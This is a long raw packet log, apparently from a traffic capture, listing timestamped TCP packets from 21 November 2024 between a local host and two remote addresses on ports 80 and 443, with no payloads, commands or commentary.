                                                                                                                                                                              Nov 21, 2024 08:30:35.679999113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.680097103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.680140018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.681042910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.681061983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.681112051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.681714058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.681823015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.681862116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.682677984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.682816029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.682862043 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.683554888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.683681011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.683725119 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.684391975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.684504986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.684549093 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.685241938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.685364008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.685400963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.686150074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.686242104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.686286926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.687026024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.687199116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.687242985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.687975883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.688034058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.688086033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.688759089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.688898087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.688937902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.689716101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.689759016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.689805031 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.690557003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.690757036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.690804005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.691451073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.691601038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.691656113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.692327023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.692539930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.692595005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.693214893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.693331003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.693382978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.694088936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.694200993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.694264889 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.695019007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.695123911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.695173979 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.695866108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.696012974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.696063995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.696743011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.696858883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.696914911 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.697630882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.697747946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.697799921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.698609114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.698633909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.698685884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.699395895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.699657917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.699723005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.700306892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.700386047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.700429916 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.701200962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.701339960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.701385021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.702073097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.702193975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.702235937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.702991009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.703054905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.703100920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.703830957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.703926086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.703973055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.704705000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.704808950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.704853058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.705574989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.705691099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.705739021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.706469059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.706600904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.706645012 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.707348108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.707492113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.707535982 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.708267927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.708364010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.708409071 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.709115028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.709250927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.709295988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.710010052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.710119963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.710164070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.710877895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.710949898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.710999966 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.711885929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.711990118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.712111950 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.712587118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.763371944 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.867744923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.867801905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.867898941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.868020058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.868257046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.868371964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.868933916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.869056940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.869093895 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.869797945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.869941950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.869978905 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.870687962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.870759964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.870791912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.871598005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.871740103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.871778965 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.872426987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.872524023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.872558117 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.873359919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.873471975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.873516083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.874263048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.874375105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.874423027 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.875112057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.875210047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.875248909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.876104116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.876200914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.876240015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.876888990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.876988888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.877028942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.877768993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.877890110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.877931118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.878647089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.878787041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.878824949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.879527092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.879631996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.879666090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.880431890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.880572081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.880606890 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.881297112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.881405115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.881444931 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.882184029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.882282972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.882320881 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.883057117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.883161068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.883196115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.884023905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.884125948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.884162903 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.884836912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.884953022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.884994984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.885749102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.885879993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.885921955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.886579990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.886713028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.886753082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.887495041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.887599945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.887640953 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.888360023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.888468981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.888509989 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.889267921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.889391899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.889445066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.890135050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.890244007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.890288115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.891014099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.891130924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.891206026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.891906023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.892019987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.892057896 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.892802954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.892921925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.892963886 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.893668890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.893785000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.893829107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.894562960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.894674063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.894716978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.895431995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.895558119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.895597935 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.896404028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.896459103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.896503925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.897200108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.897300959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.897344112 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.898092031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.898205996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.898248911 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.898977041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.899101019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.899142027 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.899873972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.899985075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.900019884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.900748968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.900871038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.900909901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.901628971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.901730061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.901767969 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.902514935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.902627945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.902662992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.903397083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.903448105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.903498888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.904294014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.904396057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.904427052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.905152082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.905297995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.905368090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.906039000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.906152964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.906191111 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.906999111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.907099009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.907135010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.908044100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.908088923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.908137083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.908698082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.908809900 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.908857107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.908966064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.909579992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.909704924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.909738064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.910499096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.910613060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.910651922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.911377907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.911467075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.911501884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.912241936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.912358999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.912405014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.913119078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.913238049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.913271904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.913943052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.917377949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:35.923511982 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.923943043 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.923968077 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.924509048 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:35.924515009 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:35.925462961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.069403887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.069526911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.069693089 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.069721937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.069761038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.069813967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.070692062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.070837975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.070882082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.071444988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.071549892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.071597099 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.072355032 CET8049762185.215.113.16192.168.2.6
